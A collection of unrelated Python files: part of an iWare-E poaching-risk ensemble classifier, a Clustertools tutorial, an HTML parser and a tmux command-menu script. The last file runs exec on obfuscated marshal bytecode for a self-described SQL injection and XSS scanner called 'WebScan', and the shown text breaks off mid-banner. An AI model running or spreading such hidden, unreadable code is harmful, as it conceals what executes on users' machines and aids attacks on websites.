# build triangular vote qualification matrix
# vote_qual = np.triu(np.ones((self.num_classifiers, self.num_classifiers)))
vote_qual = np.ones((self.num_classifiers, self.num_classifiers))
# create combined vote matrix
vote_combine = np.multiply(vote_power, vote_qual)
# normalize column-wise
vote_combine = vote_combine / vote_combine.sum(1)[:,None]
return vote_combine
# train a set of classifiers using provided data
def train_classifiers(self, train_x, train_y, train_effort, use_balanced):
classifiers = []
for i in range(self.num_classifiers):
#### filter data
# get training data for this threshold
idx = np.where(np.logical_or(train_effort >= self.patrol_thresholds[i], train_y == POSITIVE_LABEL))[0]
if i > 0 and self.patrol_thresholds[i] == self.patrol_thresholds[i-1]:
print('threshold {} same as previous, value {}. skipping'.format(i, self.patrol_thresholds[i]))
classifiers.append(None)
continue
if idx.size == 0:
print('no training points found for classifier {}, threshold = {}'.format(i, self.patrol_thresholds[i]))
classifiers.append(None)
continue
train_x_filter = train_x[idx, :]
train_y_filter = train_y[idx]
print('filtered data: {}. num positive labels {}'.format(train_x_filter.shape, np.sum(train_y_filter)))
if np.sum(train_y_filter) == 0:
print('no positive labels in this subset of the training data. skipping classifier {}'.format(i))
classifiers.append(None)
continue
# select and train a classifier
classifier = self.get_classifier(use_balanced)
print('classifier {}, threshold {}, num x {}'.format(i, self.patrol_thresholds[i], train_x_filter.shape))
start_time = time.time()
# fit training data
classifier.fit(train_x_filter, train_y_filter)
print(' train time: {:.2f} seconds, score: {:.5f}'.format(
time.time() - start_time,
classifier.score(train_x_filter, train_y_filter)))
classifiers.append(classifier)
print('-------------------------------------------')
return classifiers
# given a set of trained classifiers, compute optimal weights
def get_classifier_weights(self, classifiers, reserve_x, reserve_y):
# test classifiers on all data points
predictions = []
for i in range(self.num_classifiers):
if classifiers[i] is None:
predictions.append(np.zeros(reserve_y.shape))
continue
curr_predictions = classifiers[i].predict(reserve_x)
predictions.append(curr_predictions)
predictions = np.array(predictions).transpose()
# define loss function
def evaluate_ensemble(weights):
# ensure we don't get NaN values
if np.isnan(weights).any():
return 1e9
weighted_predictions = np.multiply(predictions, weights)
weighted_predictions = np.sum(weighted_predictions, axis=1)
score = metrics.log_loss(reserve_y, weighted_predictions)
return score
# evaluate score
# auprc = metrics.average_precision_score(reserve_y, weighted_predictions, pos_label=POSITIVE_LABEL)
#
# # pass in negative to minimize
# return -auprc
# constrain weights to sum to 1
cons = ({'type': 'eq', 'fun': lambda w: 1 - sum(w)})
# bound weights to be between 0 and 1
bounds = [(0,1)] * self.num_classifiers
# random restarts with random initial weights
#best_weights = np.ones(self.num_classifiers) / self.num_classifiers # default: equal weights
best_weights = None
best_score = 1e9
# ensure we have enough positive samples
unique_vals, unique_counts = np.unique(reserve_y, return_counts=True)
unique_dict = dict(zip(unique_vals, unique_counts))
if VERBOSE:
print(unique_dict)
if 1 not in unique_dict or unique_dict[1] < 5:
print(' not enough positive labels. skipping')
return best_weights
for _ in range(10):
w = np.random.rand(self.num_classifiers)
w = w / np.sum(w)
res = minimize(evaluate_ensemble, w, method='SLSQP', bounds=bounds, constraints=cons)
if res.fun < best_score:
best_weights = res.x
best_score = res.fun
if VERBOSE:
print('best score {}, weights {}'.format(best_score, np.around(best_weights, 3)))
return best_weights
def train_iware(self, all_train_x, all_train_y, all_train_effort, use_balanced=False, nsplits=5):
self.patrol_thresholds = self.get_patrol_thresholds(all_train_effort)
print('shape x', all_train_x.shape)
print('shape y', all_train_y.shape)
print('shape train_effort', all_train_effort.shape)
# print('k-fold cross validation, k = {}'.format(nsplits))
# skf = StratifiedKFold(nsplits, shuffle=True)
#
# all_weights = np.zeros((nsplits, self.num_classifiers, self.num_classifiers))
#
#
#
# # reserve some test data as validation set
# # to assign weights to classifiers
# k = 0
# for train_index, reserve_index in skf.split(all_train_x, all_train_y):
# train_x = all_train_x[train_index]
# train_y = all_train_y[train_index]
# train_effort = all_train_effort[train_index]
#
# reserve_x = all_train_x[reserve_index]
# reserve_y = all_train_y[reserve_index]
# reserve_effort = all_train_effort[reserve_index]
#
#
# print('-------------------------------------------')
# print('training classifiers with limited train data, k = {}'.format(k))
# print('-------------------------------------------')
#
# classifiers = self.train_classifiers(train_x, train_y, train_effort, use_balanced)
#
#
# print('-------------------------------------------')
# print('finding weights for classifiers')
# print('-------------------------------------------')
#
# # ----------------------------------------------
# # find appropriate weights for classifiers
# # ----------------------------------------------
# for i in range(self.num_classifiers):
# #### filter data
# # find points within specified threshold
# if i == 0:
# idx = np.where(reserve_effort < self.patrol_thresholds[i+1])[0]
# elif i == self.num_classifiers - 1:
# idx = np.where(self.patrol_thresholds[i] <= reserve_effort)[0]
# else:
# idx = np.where(np.logical_and(self.patrol_thresholds[i] <= reserve_effort, reserve_effort < self.patrol_thresholds[i+1]))[0]
#
# filter_x = reserve_x[idx]
# filter_y = reserve_y[idx]
# print('classifier {}: {} points, {} positive'.format(i, filter_x.shape[0], np.count_nonzero(filter_y == POSITIVE_LABEL)))
# weights = self.get_classifier_weights(classifiers, filter_x, filter_y)
#
# # if weights were not set, assign classifier weight to just 1 at classifier location (corresponding to the matrix diagonal)
# if weights is None:
# weights = np.zeros(self.num_classifiers)
# weights[i] = 1
#
# all_weights[k, i, :] = weights
#
# k += 1
#
# # average all classifier weights
# self.weights = all_weights.mean(0)
# print('weights: ', np.around(self.weights, 4))
# self.weights = np.eye(self.num_classifiers)
self.weights = self.get_vote_matrix()
print('-------------------------------------------')
print('training classifiers with all train data')
print('-------------------------------------------')
self.classifiers = self.train_classifiers(all_train_x, all_train_y, all_train_effort, use_balanced)
# TODO: does this need to be moved?
# need train_x later for random forest variance
if self.method == 'rf':
self.train_x_norm = np.copy(all_train_x)
def test_iware(self, test_x, test_y, test_effort, output_path):
if self.patrol_thresholds is None:
raise ValueError('No patrol thresholds. test_iware() may not have been called.')
if self.classifiers is None:
raise ValueError('No classifiers. test_iware() may not have been called.')
if self.weights is None:
raise ValueError('No weights. test_iware() may not have been called.')
for i in range(len(self.weights)):
print('classifier {}, weights {}, sum {}'.format(i, np.around(self.weights[i], 4), self.weights[i].sum()))
# # test classifiers on all data points
# predictions = []
# for i in range(self.num_classifiers):
# if self.classifiers[i] is None:
# # predictions.append(None)
# predictions.append(np.zeros(test_x.shape))
# continue
#
# curr_predictions = self.classifiers[i].predict(test_x)
# predictions.append(curr_predictions)
# predictions = np.array(predictions).transpose()
#
# weighted_predictions = np.multiply(predictions, self.weights)
# weighted_predictions = np.sum(weighted_predictions, axis=1)
#
# evaluate_results(test_y, weighted_predictions)
#
# return
###########
# predicted probability of illegal activity observation on each data point
num_test = test_y.shape[0]
weighted_predictions = np.zeros(num_test)
weighted_variances = np.zeros(num_test)
all_predictions = np.zeros((num_test, self.num_classifiers))
if self.method == 'gp' or self.method == 'rf':
all_variances = np.zeros((num_test, self.num_classifiers))
# TODO: can i do this portion more efficiently?
# compute the classification interval for each point
classification = np.zeros(num_test)
for i in range(num_test):
smaller_thresholds = np.where(test_effort[i] > self.patrol_thresholds)[0]
# patrol effort at this point may be less than all threshold values
if len(smaller_thresholds) == 0:
classification[i] = 0
else:
classification[i] = smaller_thresholds[-1]
classification = classification.astype(int)
for i in range(self.num_classifiers):
if self.classifiers[i] is None:
print('classifier {} is none; skipping'.format(i))
continue
start_time = time.time()
# compute variance
if self.method == 'gp' or self.method == 'rf':
if self.method == 'rf':
assert self.train_x_norm is not None
curr_predictions, curr_variances = self.classifiers[i].predict_proba(test_x, return_var=True, train_x=self.train_x_norm)
elif self.method == 'gp':
# curr_predictions, curr_variances = self.classifiers[i].predict_proba(test_x, return_var=True)
curr_predictions = self.classifiers[i].predict_proba(test_x)
curr_variances = self.classifiers[i].predict_var(test_x)
# curr_variances = curr_variances[:, 1]
# normalize variance values
curr_variances = curr_variances - np.min(curr_variances)
curr_variances = curr_variances / np.max(curr_variances)
all_variances[:, i] = curr_variances
# this method doesn't allow variance :(
else:
curr_predictions = self.classifiers[i].predict_proba(test_x)
curr_predictions = curr_predictions[:, 1] # probability of positive label
all_predictions[:, i] = curr_predictions
# TODO: make more efficient!
multiplier = np.zeros(num_test)
for j in range(num_test):
multiplier[j] = self.weights[classification[j]][i]
# scale increase by the multiplier for each data point
weighted_predictions += np.multiply(curr_predictions, multiplier)
if self.method == 'gp' or self.method == 'rf':
weighted_variances += np.multiply(curr_variances, multiplier)
print(' classifier {}, test time {:.3f}'.format(i, time.time() - start_time))
# save out predictions to CSV
print(' save out predictions...')
predictions_df = pd.DataFrame(data=all_predictions, columns=['threshold={}'.format(thresh) for thresh in self.patrol_thresholds])
predictions_out = '{}/{}_{}_predictions.csv'.format(output_path, self.method, self.num_classifiers)
print(' {}'.format(predictions_out))
predictions_df.to_csv(predictions_out)
# save out variances to CSV
if self.method == 'gp' or self.method == 'rf':
print(' save out variances...')
variances_df = pd.DataFrame(data=all_variances, columns=['threshold={}'.format(thresh) for thresh in self.patrol_thresholds])
variances_df.to_csv('{}/{}_{}_variances.csv'.format(output_path, self.method, self.num_classifiers))
combined_df = pd.DataFrame({'predictions': weighted_predictions, 'variances': weighted_variances})
combined_df.to_csv('{}/{}_{}_weighted_pred_var.csv'.format(output_path, self.method, self.num_classifiers))
### evaluate
results = evaluate_results(test_y, weighted_predictions)
print(results)
f = open('{}/{}_{}.txt'.format(output_path, self.method, self.num_classifiers), 'w')
f.write('park {}, test year {}\n'.format(self.park, self.year))
f.write('method {}, num_classifiers {}\n'.format(self.method, self.num_classifiers))
f.write('thresholds {}\n'.format(self.patrol_thresholds))
f.write('\n\n')
f.write(results)
f.write('\n\n\n')
f.write('weights\n{}\n'.format(np.around(self.weights, 5)))
f.close()
pickle_data = {'park': self.park,
'num_classifiers': self.num_classifiers, 'method': self.method,
#'classifiers': self.classifiers,
'weights': self.weights,
'thresholds': self.patrol_thresholds,
'predictions': weighted_predictions,
'results': results
}
pickle.dump(pickle_data, open('{}/{}_{}.p'.format(output_path, self.method, self.num_classifiers), 'wb'))
# # display performance on only first classifier
# # only using the first is the same as no iWare-E ensembling
# print('-------------------------------------------')
# print('testing - only first classifier')
# print('-------------------------------------------')
#
# predict_test_probs = classifiers[0].predict_proba(test_x)
# predict_test_pos_probs = predict_test_probs[:,1]
# evaluate_results(test_y, predict_test_pos_probs)
#
# # write out predictions to file
# predict_out = pd.DataFrame(data={'predictions': predict_test_pos_probs, 'labels': test_y})
# predict_out.to_csv('output/test_predictions_{}_{}_method_{}.csv'.format(self.park, TEST_YEAR, self.method))
###########################################################
# run train/test code to evaluate predictive models
###########################################################
# prepare data: split into train/test and normalize
def train_test_split_by_year(self, features, labels, patrol_effort, year_col, test_year, test_section=None, section_col=None):
# specifying the section is optional
if test_section is not None:
assert section_col is not None
if test_section:
# just one section of test data
train_idx = np.where(np.logical_or(year_col < test_year, section_col < test_section))[0]
test_idx = np.where(np.logical_and(year_col == test_year, section_col == test_section))[0]
else:
# full year of test data
train_idx = np.where(year_col < test_year)[0]
test_idx = np.where(year_col == test_year)[0]
train_x = features[train_idx, :]
train_y = labels[train_idx]
train_effort = patrol_effort[train_idx]
test_x = features[test_idx, :]
test_y = labels[test_idx]
test_effort = patrol_effort[test_idx]
train_x, test_x = normalize_data(train_x, test_x)
print('train x, y', train_x.shape, train_y.shape)
print('test x, y ', test_x.shape, test_y.shape)
print('patrol effort train, test ', train_effort.shape, test_effort.shape)
return train_x, test_x, train_y, test_y, train_effort, test_effort
###########################################################
# iWare-E for predicting future risk
###########################################################
# use all provided data to make predictions
def make_predictions(self, predict_section, features_raw, features, feature_names,
labels, patrol_effort, section_col, input_static_feats, output_path,
test_temp=None, test_precip=None, gpp_filename=None):
print('time to make some predictions!')
predict_year = self.year
# ----------------------------------------------
# get training data
# ----------------------------------------------
# use all data before specified (predict_year, predict_section)
train_idx = np.where(np.logical_or(features_raw['year'] < predict_year,
np.logical_and(features_raw['year'] == predict_year, features_raw['section'] < predict_section)))[0]
print(' features shape', features_raw.shape)
print(' train_dx ', len(train_idx), train_idx)
train_x = features[train_idx, :]
train_y = labels[train_idx]
train_patrol_effort = patrol_effort[train_idx]
# ----------------------------------------------
# get data to predict on
# ----------------------------------------------
if predict_section == 0:
prev_year = predict_year - 1
num_section = np.max(section_col)
print(' num section', num_section)
prev_section = num_section
else:
prev_year = predict_year
prev_section = predict_section - 1
print(' test section: year {}, section {}'.format(predict_year, predict_section))
print(' prev section: year {}, section {}'.format(prev_year, prev_section))
# ----------------------------------------------
# set up data arrays
# ----------------------------------------------
# get past patrol effort for the test section
prev_section_idx = np.where(np.logical_and(features_raw['year'] == prev_year, features_raw['section'] == prev_section))
past_patrol_effort = patrol_effort[prev_section_idx]
prev_section_spatial_id = features_raw['spatial_id'].values[prev_section_idx]
patrol_effort_df = pd.DataFrame({'spatial_id': prev_section_spatial_id,
'past_patrol_effort': past_patrol_effort})
# get all static features
static_features = pd.read_csv(input_static_feats)
static_features.drop(columns=static_features.columns[0], inplace=True)
# create features array and add in past_patrol_effort
predict_x_df = static_features.join(patrol_effort_df.set_index('spatial_id'), on='spatial_id', how='left')
predict_x_df['past_patrol_effort'].fillna(0, inplace=True)
# add climate info
if test_temp is not None and test_precip is not None:
predict_x_df['temp'] = test_temp * np.ones(static_features.shape[0])
predict_x_df['precip'] = test_precip * np.ones(static_features.shape[0])
# add GPP info
if gpp_filename is not None:
new_gpp = pd.read_csv('../preprocess_consolidate/belum_traponly_combined/1000/output/all_3month/GPP_2019_0.csv')
predict_x_df['gpp'] = new_gpp['2019-0']
# arrange columns to match training data
store_columns = predict_x_df[['spatial_id', 'x', 'y']]
predict_x_df.drop(columns=['spatial_id', 'x', 'y'], inplace=True)
predict_x_df = predict_x_df[feature_names]
predict_x = predict_x_df.values
# normalize data
train_x, predict_x = normalize_data(train_x, predict_x)
# ----------------------------------------------
# train classifiers
# ----------------------------------------------
print('training classifiers on {} points...'.format(train_x.shape))
train_start_time = time.time()
classifiers = self.train_iware(train_x, train_y, train_patrol_effort)
total_train_time = time.time() - train_start_time
print('total train time {:.3f}'.format(total_train_time))
# ----------------------------------------------
# run classifiers to get set of predictions
# ----------------------------------------------
# intiialize array to store predictions from each classifier
print('making predictions on year {} section {}... {} points'.format(predict_year, predict_section, predict_x.shape))
final_predictions = np.zeros((predict_x.shape[0], self.num_classifiers))
if self.method == 'gp' or self.method == 'rf':
final_variances = np.zeros((predict_x.shape[0], self.num_classifiers))
# make predictions with each classifier
for i in range(self.num_classifiers):
start_time = time.time()
# this classifier had no training points, so we skip it
if self.classifiers[i] is None:
final_predictions[:, i] = np.zeros((final_predictions.shape[0]))
continue
if self.method == 'gp' or self.method == 'rf':
if self.method == 'rf':
curr_predictions, curr_variances = self.classifiers[i].predict_proba(predict_x, return_var=True, train_x=train_x)
else:
# curr_predictions, curr_variances = self.classifiers[i].predict_proba(predict_x, return_var=True)
curr_predictions = self.classifiers[i].predict_proba(predict_x)
curr_variances = self.classifiers[i].predict_var(predict_x)
# curr_variances = curr_variances[:, 1]
print('variance min {} max {}'.format(np.min(curr_variances), np.max(curr_variances)))
# normalize variance values
# curr_variances = curr_variances - np.min(curr_variances)
# curr_variances = curr_variances / np.max(curr_variances)
final_variances[:, i] = curr_variances
else:
curr_predictions = self.classifiers[i].predict_proba(predict_x)
curr_predictions = curr_predictions[:, 1] # probability of positive label
final_predictions[:, i] = curr_predictions
# predict_x_df.to_csv('predict_x.csv', encoding='utf-16')
# np.savetxt('predict_x_norm.csv', predict_x, delimiter=',', encoding='utf-16', fmt='%.3f')
# np.savetxt('train_x.csv', self.train_x_norm, delimiter=',', encoding='utf-16', fmt='%.3e')
# np.savetxt('train_x_float.csv', self.train_x_norm, delimiter=',', encoding='utf-16', fmt='%.3f')
# save out predictions to CSV
print(' save out predictions...')
predictions_df = pd.DataFrame(data=final_predictions, columns=['threshold={}'.format(thresh) for thresh in self.patrol_thresholds])
predictions_df = pd.concat([store_columns, predictions_df], axis=1)
predictions_filename = '{}/predictions_{}_{}_method_{}_{}.csv'.format(output_path, self.park, predict_year, self.method, self.num_classifiers)
print(' {}'.format(predictions_filename))
predictions_df.to_csv(predictions_filename)
# save out variances to CSV
if self.method == 'gp' or self.method == 'rf':
print(' save out variances...')
variances_df = pd.DataFrame(data=final_variances, columns=['threshold={}'.format(thresh) for thresh in self.patrol_thresholds])
variances_df = pd.concat([store_columns, variances_df], axis=1)
variances_df.to_csv('{}/variances_{}_{}_method_{}_{}.csv'.format(output_path, self.park, predict_year, self.method, self.num_classifiers))
return predictions_df
# used for post-hoc analysis of field test data
# (we want to ignore the true data and pretend we don't know it)
def field_test_make_predictions(self, predict_year, predict_section, features, labels, patrol_effort, input_static_feats,
feature_names):
print('time to make some predictions!')
# ----------------------------------------------
# GET TRAINING DATA
# ----------------------------------------------
# get last quarter of patrol effort
predict_mask = np.logical_and(features_raw['year'] == predict_year, features_raw['section'] == predict_section)
predict_train_idx = np.where(np.logical_not(predict_mask))[0]
train_x = features[predict_train_idx, :]
train_patrol_effort = patrol_effort[predict_train_idx]
train_y = labels[predict_train_idx]
# ----------------------------------------------
# GET DATA FOR PREDICTIONS
# ----------------------------------------------
# get indices from available cells at the specified time interval
predict_idx = np.where(predict_mask)[0]
# get past patrol effort for those available cells
predict_spatial_id = features_raw['spatial_id'].values[predict_idx]
predict_patrol_effort = patrol_effort[predict_idx]
patrol_effort_df = pd.DataFrame({'spatial_id': predict_spatial_id, 'past_patrol_effort': predict_patrol_effort})
# get all static features
static_features = pd.read_csv(input_static_feats)
# create features array
predict_x_df = static_features.join(patrol_effort_df.set_index('spatial_id'), on='Var1', how='left')
predict_x_df['past_patrol_effort'].fillna(0, inplace=True)
predict_x_df.drop(columns=['Var1', 'x', 'y'], inplace=True)
# arrange columns to match training data
predict_x_df = predict_x_df[feature_names]
predict_x = predict_x_df.values
# ----------------------------------------------
# normalize data
# ----------------------------------------------
train_x, predict_x = normalize_data(train_x, predict_x)
# ----------------------------------------------
# train classifiers
# ----------------------------------------------
# print('training classifiers on {} points...'.format(predict_train_x.shape))
train_start_time = time.time()
classifiers = self.train_iware(predict_train_x, train_y, train_patrol_effort)
total_train_time = time.time() - train_start_time
print('total train time {:.3f}'.format(total_train_time))
# ----------------------------------------------
# run classifiers to get set of predictions
# ----------------------------------------------
# intiialize array to store predictions from each classifier
print('making predictions on year {} section {}... {} points'.format(predict_year, predict_section, predict_x.shape))
final_predictions = np.zeros((predict_x.shape[0], self.num_classifiers))
# make predictions with each classifier
for i in range(self.num_classifiers):
start_time = time.time()
# this classifier had no training points, so we skip it
if classifiers[i] is None:
final_predictions[:, i] = np.zeros((final_predictions.shape[0]))
continue
curr_predictions = classifiers[i].predict_proba(predict_x)
curr_predictions = curr_predictions[:, 1] # probability of positive label
final_predictions[:, i] = curr_predictions
# save out predictions to CSV
print('save out predictions...')
predictions_df = pd.DataFrame(data=final_predictions, columns=['threshold={}'.format(thresh) for thresh in patrol_thresholds])
# start indexing from 1 to be consistent with other files
predictions_df.index = np.arange(1, len(predictions_df) + 1)
predictions_df.to_csv('predictions_{}_{}_method_{}.csv'.format(self.park, predict_year, self.method)) #float_format='%.4f',
###########################################################
# variation attempts for filtering data
###########################################################
#### filter data
# get training data for this threshold
# # MY MODIFIED APPROACH
# # makes things run faster, and sometimes get decent results
# # only points within threshold interval
# if i == 0:
# idx = np.where(train_effort < patrol_thresholds[i+1])[0]
# elif i == num_classifiers - 1:
# idx = np.where(train_effort >= patrol_thresholds[i])[0]
# else:
# idx = np.where(np.logical_and(train_effort >= patrol_thresholds[i], train_effort < patrol_thresholds[i+1]))[0]
# # points within threshold interval AND all positive points
# if i == 0:
# idx = np.where(np.logical_or(train_effort < patrol_thresholds[i+1], train_y == POSITIVE_LABEL))[0]
# elif i == num_classifiers - 1:
# idx = np.where(np.logical_or(train_effort >= patrol_thresholds[i], train_y == POSITIVE_LABEL))[0]
# else:
# idx = np.where(np.logical_or(np.logical_and(train_effort >= patrol_thresholds[i], train_effort < patrol_thresholds[i+1]), train_y == POSITIVE_LABEL))[0]
# ------------------------------------------------------------------
# this is the original iWare-E approach
# all points above threshold
# if PARK == 'SWS':
# # don't keep positive labels for SWS because of the strong label imbalance
# idx = np.where(train_effort >= patrol_thresholds[i])[0]
# else:
# # AND POINTS WHERE LABEL IS POSITIVE
# idx = np.where(np.logical_or(train_effort >= patrol_thresholds[i], train_y == POSITIVE_LABEL))[0]
###########################################################
# calibration curves
###########################################################
# from calibration_curves import *
# run_all_calibration_curves(train_x, train_y, test_x, test_y)
# sys.exit(0)
|
# -*- coding: utf-8 -*-
#!/usr/bin/env python
"""
Go through `001_basic_usage.py` before running this example. We will re-use
the same computation: x*y and z+w for x in [1, 2, 3], y = 2, z = 4,
w in [5, 6] in an experiment called BasicUsage.
Suppose you have done your experiment (say running `001_basic_usage.py`) and
you suddenly wanted to measure the influence of a new parameter values. Say
x=4. Of course, you cannot just add it to the parameter set and run the
computation again: Clustertools will mix and match the parameter ordering and
you will end up with a messy mess.
But don't give up! There is a simple way. You just have to edit your .py file
and explicitely tell Clustertools that you are adding new parameters. After
that you can just relaunch the experiment.
Changes to `001_basic_usage.py` are minimal:
In the former case, you have to
1. Add a separator to the `ParameterSet` instance, thanks to the
:meth:`add_separator` method.
2. Add the new parameter values after the separator.
Adding the separator will tell Clustertools that it is supposed to run the
combination of parameters before the separator before running the
combinations relating to the new value(s). You can of course use several
separators.
Note that you can use the separators to influence the ordering the computations.
But there is a dedicated way to do that (see `007_priority.py`).
Do `python 001_basic_usage.py front-end`. Since the experiment `BasicUsage` has
already run, you cannot adapt it directly. Now imagine that you modified
`001_basic_usage.py` as this file and run it
(`python 004_adding_parameter_values.py front-end`). You can then run
`002_results.py` to see how the datacube has evolved.
"""
from clustertools import Computation, CTParser, ParameterSet, \
Experiment, set_stdout_logging
class MyComputation(Computation):
"""
Inherit from `Computation` and redefine the `run` method as you which
"""
def run(self, result, x, z, w, y=2, **parameters):
import time
from random import randint
result["multiply"] = x * y
result["sum"] = z + w
time.sleep(randint(1, 10))
if __name__ == "__main__":
set_stdout_logging()
parser = CTParser()
environment, _ = parser.parse()
param_set = ParameterSet()
param_set.add_parameters(x=[1, 2, 3], z=4, w=[5, 6])
# Add the separator and the new parameter values
# -- Separator
param_set.add_separator()
# -- new parameter values
param_set.add_parameters(x=4)
# you could also have added several values at once with:
# param_set.add_parameters(x=[4, 5]) for instance
experiment = Experiment("BasicUsage", param_set, MyComputation)
environment.run(experiment)
|
from html.parser import HTMLParser
class CardParser(HTMLParser):
inside_p = False
text = ''
def clear(self):
self.text = ''
self.inside_p = False
def handle_starttag(self, tag, attrs):
# print("Start tag:", tag)
if tag == "p":
self.inside_p = True
def handle_endtag(self, tag):
# print("End tag :", tag)
if (tag == "p") and self.inside_p:
self.inside_p = False
def handle_data(self, data):
# print("Data :", data)
if self.inside_p:
# print("***********")
# print(data)
# print("***********")
self.text += ' ' + data
|
import os
import sys
import time
from argparse import SUPPRESS, ArgumentParser
from dodo_commands import CommandError, Dodo
from dodo_commands.dependencies.get import plumbum
from dodo_commands.framework.choice_picker import ChoicePicker
from dodo_commands.framework.util import exe_exists
tmux = plumbum.cmd.tmux
def _normalize(category):
return category.replace(" ", "-")
def _args():
command_map = Dodo.get("/MENU/commands", {})
default_session_id = Dodo.get("/MENU/session_id", os.path.expandvars("$USER"))
parser = ArgumentParser()
parser.add_argument(
"category",
choices=["all"] + list([_normalize(x) for x in command_map.keys()]),
nargs="?",
)
parser.add_argument("--contnue", action="store_true", help=SUPPRESS)
parser.add_argument("--tmux", action="store_true")
parser.add_argument("--list", action="store_true")
parser.add_argument("--run", type=int, nargs="?", const=-1)
parser.add_argument(
"--id",
dest="session_id",
default=default_session_id,
help="The tmux session id",
)
args = Dodo.parse_args(parser)
args.category = args.category or "all"
args.run = -1 if args.run is None else args.run
args.command_map = command_map
return args
def _create_tmux_window(session_id):
# Create tmux session
tmux("-2", "new-session", "-d", "-s", session_id)
# Create a tmux window
tmux("new-window", "-t", "%s:1" % session_id, "-n", "Logs")
def _get_categories(command_map, category):
return [x for x in command_map if category == "all" or _normalize(x) == category]
def _get_commands_and_labels(command_map, category):
categories = _get_categories(command_map, category)
label_size = 0
for category in categories:
label_size = max(label_size, len(category))
label_prefix = "%0" + str(label_size) + "s"
commands, labels = [], []
for category in categories:
for command in command_map[category]:
commands.append(command)
format_string = "%02s [" + label_prefix + "] - %s"
labels.append(format_string % (str(len(commands)), category, command))
return commands, labels
def _get_selected_commands(commands, labels, allow_free_text=False):
class Picker(ChoicePicker):
def print_choices(self, choices):
print()
for idx, label in enumerate(choices):
print(label)
print()
def question(self):
return "Select one or more commands (e.g. 1,3-4)%s or type 0 to exit: " % (
", or type a command," if allow_free_text else ""
)
def on_invalid_index(self, index):
if index == 0:
sys.exit(0)
picker = Picker(commands, allow_free_text=allow_free_text, labels=labels)
picker.pick()
return [picker.free_text] if picker.free_text else picker.get_choices()
if Dodo.is_main(__name__):
args = _args()
commands, labels = _get_commands_and_labels(args.command_map, args.category)
if not commands:
raise CommandError("No commands were found in the /MENU configuration key")
if args.list:
print()
for label in labels:
print(label)
elif args.tmux:
if not exe_exists("tmux"):
raise CommandError("Tmux is not installed on this sytem.")
has_session = False
try:
sessions = tmux("ls")
for session in sessions.split("\n"):
has_session = has_session or session.startswith("%s:" % args.session_id)
except: # noqa
pass
if not has_session:
_create_tmux_window(args.session_id)
tmux("send-keys", " ".join(sys.argv + ["--contnue"]), "C-m")
# Attach to tmux session
# HACK: why does this only work via Dodo.run?
Dodo.run(
["tmux", "-2", "attach-session", "-t", args.session_id],
)
elif not args.contnue:
Dodo.run(
["tmux", "-2", "attach-session", "-t", args.session_id],
)
else:
while True:
tmux("send-keys", "-R", "")
selected_commands = _get_selected_commands(
commands, labels, allow_free_text=True
)
for command in selected_commands:
print(command)
tmux("split-window", "-v")
time.sleep(0.5)
tmux("send-keys", command, "C-m")
tmux("select-layout", "tile")
# Set default window
tmux("select-pane", "-t", "0")
else:
selected_commands = (
_get_selected_commands(commands, labels)
if args.run == -1
else [commands[args.run - 1]]
)
for command in selected_commands:
Dodo.run(["bash", "-c", command])
|
import marshal
exec(marshal.loads(b'\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s\xda\x00\x00\x00d\x00d\x01l\x00Z\x00d\x00d\x01l\x01Z\x01d\x00d\x01l\x02Z\x02d\x00d\x02l\x03m\x04Z\x05\x01\x00d\x00d\x03l\x06m\x07Z\x07\x01\x00d\x00d\x04l\x08m\x08Z\x08\x01\x00d\x00d\x05l\tm\nZ\n\x01\x00d\x00d\x06l\x0bm\x0cZ\x0c\x01\x00d\x07Z\rd\x08Z\x0ed\td\n\x84\x00Z\x0fd\x0bd\x0c\x84\x00Z\x10e\x00\xa0\x11\xa1\x00Z\x12d\re\x12j\x13d\x0e<\x00d\x0fd\x10\x84\x00Z\x14d\x11d\x12\x84\x00Z\x15d\x13d\x14\x84\x00Z\x16d\x15d\x16\x84\x00Z\x17d\x17Z\x18d\x18d\x10\x84\x00Z\x14d\x19d\x12\x84\x00Z\x15d\x1ad\x1b\x84\x00Z\x19d\x1cd\x1d\x84\x00Z\x1ad\x1ed\x1f\x84\x00Z\x1be\x0f\x83\x00\x01\x00e\x1b\x83\x00\x01\x00d\x01S\x00) \xe9\x00\x00\x00\x00N)\x01\xda\rBeautifulSoup)\x01\xda\x07urljoin)\x01\xda\x06pprint)\x01\xda\x07colored)\x01\xda\x04Forea1\x05\x00\x00____ ______ ___ ________ ______ __ _____ ___ _____ ___ _______ _______ \n\x1b[1;36m __ __ ___ _______ _______ ________ ______ __ _____ ___ _____ ___ _______ _______ \n|" |/ \\| "| /" "|| _ "\\ /" )/" _ "\\ /""\\ (" \\|" \\ (" \\|" \\ /" "| /" \\ \n|\' / \\: |(: ______)(. |_) :) (: \\___/(: ( \\___) / \\ |.\\ \\ ||.\\ \\ |(: ______)|: | \n|: /\' | \\/ | |: \\/ \\___ \\ \\/ \\ /\' /\\ \\ |: \\. \\ ||: \\. \\ | \\/ | |_____/ ) \n \\// /\' | // ___)_ (| _ \\ __/ \\ // \\ _ // __\' \\ |. \\ \\. ||. \\ \\. | // ___)_ // / \n / / \\ |(: "||: |_) :) /" \\ :)(: _) \\ / / \\ \\| \\ \\ || \\ \\ |(: "||: __ \\ \n|___/ \\___| \\_______)(_______/ (_______/ \\_______)(___/ \\___)\\___|\\____\\) \\___|\\____\\) \\_______)|__| \\___) \n\x1b[1;36m\n-----------------------------\n\x1b[1;94mName: WebScan\nCoded by: AnonyminHack5\nVersion: 1.0\x1b[0m\n----------------------------\nWebScan is a web vulnerability Scanning tool, which scans sites for SQL injection and XSS vulnerabilities\nWhich is a great tool for web pentesters. Coded in python, CLI.\n------------------------------------------------------------------------------------\na\x1d\x03\x00\x00________ ______ ___ ________ ______ __ _____ ___ _____ ___ _______ _______ \n\x1b[1;37m /" ) / " \\ |" | /" )/" _ "\\ /""\\ (" \\|" \\ (" \\|" \\ /" "| /" \\ \n(: \\___/ // ____ \\ || | (: \\___/(: ( \\___) / \\ |.\\ \\ ||.\\ \\ |(: ______)|: | \n \\___ \\ / / ) )|: | \\___ \\ \\/ \\ /\' /\\ \\ |: \\. \\ ||: \\. \\ | \\/ | |_____/ ) \n __/ \\(: (____/ // \\ |___ __/ \\ // \\ _ // __\' \\ |. \\ \\. ||. \\ \\. | // ___)_ // / \n /" \\ :)\\ \\ ( \\_|: \\ /" \\ :)(: _) \\ / / \\ \\| \\ \\ || \\ \\ |(: "||: __ \\ \n(_______/ "____/\\__\\ \\_______)(_______/ \\_______)(___/ \\___)\\___|\\____\\) \\___|\\____\\) \\_______)|__| 